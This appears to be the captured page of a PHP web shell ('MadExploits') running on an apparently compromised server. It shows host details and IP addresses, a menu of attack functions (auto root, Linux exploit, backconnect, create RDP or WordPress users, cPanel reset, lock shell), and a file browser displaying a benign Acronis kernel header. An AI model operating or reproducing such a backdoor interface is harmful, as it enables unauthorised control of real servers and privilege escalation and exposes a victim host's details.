Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
src /
file_protector-1.1-1565 /
ftrace_hooks /
[ HOME SHELL ]
Name
Size
Permission
Action
audit_user.h
145
B
-rw-r--r--
fsnotify_events.c
5.57
KB
-rw-r--r--
fsnotify_events.h
382
B
-rw-r--r--
fsnotify_listener.c
9.91
KB
-rw-r--r--
fsnotify_listener.h
1.08
KB
-rw-r--r--
ftrace_events.c
20.17
KB
-rw-r--r--
ftrace_events.h
732
B
-rw-r--r--
reg_tools.h
694
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ftrace_events.h
/** @file ftrace_events.h @brief Events acquired via ftrace @details Copyright (c) 2024 Acronis International GmbH @author Bruce Wang (bruce.wang@acronis.com) @since $Id: $ */ #pragma once #include <linux/types.h> #ifdef KERNEL_MOCK #include "mock/mock.h" #endif void register_ftrace_post_events(void); void unregister_ftrace_post_events(void); typedef enum { FTRACE_POST_EVENT_FSNOTIFY, FTRACE_POST_EVENT_EXEC, FTRACE_POST_EVENT_EXIT, FTRACE_POST_EVENT_FORK, FTRACE_POST_EVENT_AUDIT, FTRACE_PRE_EVENT_RW_VERIFY_AREA, FTRACE_PRE_EVENT_CLONE_FILE_RANGE, FTRACE_PRE_EVENT_COPY_FILE_RANGE, FTRACE_PRE_EVENT_DO_SPLICE_DIRECT, } ftrace_post_event_type_t; bool ftrace_post_event_have(ftrace_post_event_type_t);
Close